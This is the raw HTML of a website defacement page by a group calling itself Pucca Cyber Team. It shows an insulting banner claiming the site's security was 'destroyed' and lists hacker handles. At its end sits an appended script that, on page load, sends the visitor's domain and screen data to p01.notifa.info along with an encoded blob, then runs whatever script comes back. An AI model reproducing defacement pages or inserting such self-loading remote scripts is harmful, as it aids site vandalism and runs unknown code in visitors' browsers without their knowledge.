<html><head><link rel="shortcut icon" href="https://1.bp.blogspot.com/-PVcUHUn_bHw/Xp0PUOX0h2I/AAAAAAAAAZA/NXyiJN0jEW8841pztgxRxeDs4eVwYAUiQCNcBGAsYHQ/s1600/Pucca%2BCyber%2BTeam%2B%257BOfc%257D%2B20200420_092341.jpg">
<meta property="og:type" content="website">
<meta property="og:site_name" content="Pucca Cyber Team">
<meta property="og:title" content="Pucca Cyber Team">
<meta property="og:description" content="We Are Pucca Cyber Team">
<meta property="og:description" content="Pucca Exploiter">
<title>Pucca Cyber Team</title>
<style>@font-face{font-family: "riv";src: url('https://bca-x666x-team.github.io/jhon991.ttf');}
body {margin-top: 45%;background-color: black;background-repeat: no-repeat;background-size: cover;color: white;font-family: "riv";font-weight: bold;}
.crash {font-family: "riv";font-size: 200%;width: 100%;white-space: nowrap;overflow: hidden;-webkit-animation: typing 10s steps(70, end);animation: animasi-ketik 10s steps(70, end);}
@keyframes animasi-ketik{from { width: 0; }}
@-webkit-keyframes animasi-ketik{from { width: 0; }}
w{color: red;}
op{opacity: 75%;}</style></head>
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
<body>
<center>
<img src="https://1.bp.blogspot.com/-PVcUHUn_bHw/Xp0PUOX0h2I/AAAAAAAAAZA/NXyiJN0jEW8841pztgxRxeDs4eVwYAUiQCNcBGAsYHQ/s1600/Pucca%2BCyber%2BTeam%2B%257BOfc%257D%2B20200420_092341.jpg" width=30%"/>
<br>
<div class="crash"><op>{ <w>PUCCA EXPLOITER</w> }<br>IM SORRY BITCH YOUR SECURITY HAS BEEN DESTROYED BY ᵂᴴ∅ᴵᴬᴹ?<br>{ <w>SEVEN GHOST TEAM</w> }
<br><br>
- <w>WE ARE PUCCA CYBER TEAM</w> -<br>ᵂᴴ∅ᴵᴬᴹ? ~ Tn.I7I7I7 // MR.MARITIS // MR.TIN <br> // HERSEY'S-MT187 // ./ZELFIAN-ALFIAN // FERGUSO // NwaZ
<br><br>
{ <w>POWERED BY PUCCA CYBER TEAM</w> }</op></div>
</center><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX0DFWGvJsui7DROOKoMZ%2fvWnmS28I9Joh3L4sgRTy10lWihZHTPmZBZBSiQg5ZZCFKCrzmVm6uOYhNqlvOApKwH8dvXCcpZkc9BNhrb5aYLcGWplQ%2bEFv71SEDjxlgPYLkY9Rlvvrf2ewyGYoehYRk9FjnRVWEjaa20uYEhv7tqkP%2fUHdNy%2bljJs33tdl4RTX9%2bwzr2%2fcDcXj5k8gPKNwaTUpFeL5rtzUNeDMcMA6MZeeR3toF%2fh1s2oME0p49RECd9UrM5dhHfdY31xf435yFP1WA2EqMyK4FwQZZh3ifsE9effvV9S2e1ti6QANatrMkpW6DrkwHpl5ExsmEh8EPFQfz3bOwRx5NMvtKl6Bdv1n6CuKPuNwR%2bNT46zOYy3CimCOoHCR5WWiOPakO0eAIGJTLo%2be4oSEKVYyxxP%2fmfYpi37jbwr%2f8eVnl0fXBGmO6QWKK6bNQUPQY9SsioxDkwpAdeYa0w%2bG%2fCaAIoQXw3ihe82uhYmZdDx%2fOZxBTS2IBvhp67FDWLwpkwHX1%2bfbuw%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>
